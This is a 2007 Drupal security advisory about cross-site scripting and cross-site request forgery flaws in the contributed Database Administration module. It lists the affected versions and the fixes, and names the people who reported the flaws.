Support for Drupal 7 is ending on 5 January 2025—it’s time to migrate to Drupal 10! Learn about the many benefits of Drupal 10 and find migration tools in our resource center.
By dww on
- Advisory ID: DRUPAL-SA-2007-013.
- Project: Database Administration (third-party module).
- Version: 4.6.x-1.*, 4.7.x-1.*.
- Date: 2007-April-11.
- Security risk: Critical.
- Exploitable from: Remote.
- Vulnerability: Cross site scripting and cross site request forgery.
Description
The Database Administration (dba) module allows site administrators with sufficient privileges to view and directly modify the Drupal database tables for a site. Numerous cross-site scripting (XSS) vulnerabilities were discovered when the administrator runs queries to display data from the database, and in other parts of the user interface. Learn more about XSS on Wikipedia.
Additionally, the module was never fully ported to the Drupal Form API, so there were places in the code that were still vulnerable to cross-site request forgery (CSRF) attacks. See DRUPAL-SA-2006-025 for more information.
Disabling the Database administration module provides an immediate workaround.
Versions affected
- Database administration (dba) 4.7.x-1.* before version 4.7.x-1.2.
- All versions of dba.module 4.6.x-*.
Drupal core is not affected. If you do not use the contributed Database administration module, there is nothing you need to do.
Solution
- If your site is running 4.7.x, install the latest version: Database administration 4.7.x-1.2.
- If your site is running 4.6.x, you should disable the dba.module. This version is no longer supported and the currently released 4.6.x versions are insecure.
Reported by:
- XSS by Derek Wright (dww) of the Drupal Security Team.
- CSRF by Heine Deelstra (Heine) of the Drupal Security Team.
Contact
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.
